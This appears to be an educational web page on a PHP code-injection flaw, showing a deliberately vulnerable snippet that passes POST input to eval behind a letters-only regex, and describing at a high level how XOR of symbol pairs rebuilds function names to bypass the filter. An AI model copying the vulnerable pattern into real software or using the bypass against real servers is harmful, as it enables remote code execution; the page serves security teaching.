How it works
This page explains a common vulnerability pattern and the specific technique used to bypass a naive input filter that blocks alphabetic characters only.
Vulnerable code (example)
<?php
if (isset($_POST['input'])) {
if (!preg_match('/[a-zA-Z`]/', $_POST['input'])) {
print '<fieldset><legend>Result</legend>';
eval('print ' . $_POST['input'] . ";");
print '</fieldset>';
} else {
echo "<p>Dangerous code detected</p>";
}
}
?>
Why this is a problem
- The code uses
eval, which executes arbitrary PHP code built from user input. - The filter only rejects alphabetic characters and the backtick (
`) — many other characters (symbols, digits) are allowed. - An attacker can build letters and even complete function names using operations on non-alphanumeric characters (for example, XOR
^between two bytes), then pass the filter and execute code. - Result: full remote code execution (RCE) or information disclosure depending on server privileges.
How the bypass works (high level)
- Use pairs of non-alphanumeric printable characters (for example
"#"and"@"), XOR them ("#"^"@") to produce a byte that corresponds to a letter. - Concatenate many such XOR expressions using PHP's concatenation operator
.to form function names and strings without ever including literal letters in the POST input. - The server-side regex doesn't see letters (only expressions built from allowed characters), so the input passes the test and
evalexecutes the constructed code.
This page is educational. Do not use these techniques against systems without explicit permission.